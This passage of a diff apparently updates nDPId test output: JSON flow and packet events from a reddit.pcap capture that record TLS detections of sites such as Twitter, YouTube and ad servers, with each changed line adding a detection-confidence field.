-01426{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}}
+00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00981{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00985{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01383{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}}
+01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01452{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=lon3, CN=syndication.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"09:D3:FE:9A:3E:39:A7:E2:90:5B:C9:1F:3B:7D:CE:7C:7E:08:1C:6F"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688324,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688324,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3346,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1605291688324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688324,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjQAAAAAoAL9INe7AAACBAWgBAIICn8mSwwAAAAAAQMDBw=="}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3358,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688336,"flow_last_seen":1605291688336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605291688336,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -227,33 +227,33 @@
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3372,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605291688344,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688344,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACgGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmAAAAAAoAL9ICpwAAACBAWgBAIICgi3lpgAAAAAAQMDBw=="}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3437,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688365,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnC63k25KV6Y1oBJXgLbhAAACBAV4AQMDAwQCCArC10GYfyZLDA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3438,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688365,"pkt":"qtsDr8lk5EKm5WPyht1gDP1bACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx5wBu0pXpjUut5NvgBAB+zrKAAABAQgKfyZLNcLXQZg="}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3439,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688324,"flow_last_seen":1605291688365,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688365,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3440,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688370,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAANg60eYqAcsBIEmLB5kd7IUo3\/YpAbvHnlMkjxA2CKc5oBJXgKoEAAACBAV4AQMDAwQCCArC10GjfyZLGA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3444,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605291688370,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688370,"pkt":"qtsDr8lk5EKm5WPyht1gC0OFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADYOtHmx54BuzYIpzlTJI8RgBAB+y30AAABAQgKfyZLOsLXQaM="}
-00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3446,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688336,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688371,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3449,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605291688371,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAkAAhnO4AAAZE4\/jAk6EqAcsBIEmLB5kd7IUo3\/YpAbvbeuzTe9OJtD5hoBJXgGMHAAACBAV4AQMDAwQCCArC10GlCLeWmA=="}
 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3451,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605291688371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605291688371,"pkt":"qtsDr8lk5EKm5WPyht1gATUNACAGQCoBywEgSYsHmR3shSjf9ikmAJAAIZzuAAAGROP4wJOh23oBu4m0PmHs03vUgBAB++b9AAABAQgKCLeWs8LXQaU="}
-00922{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688344,"flow_last_seen":1605291688411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605291688411,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3453,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688344,"flow_last_seen":1605291688372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605291688372,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rules.quantcount.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3517,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688324,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ad.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3521,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688336,"flow_last_seen":1605291688408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"ts_msec":1605291688408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 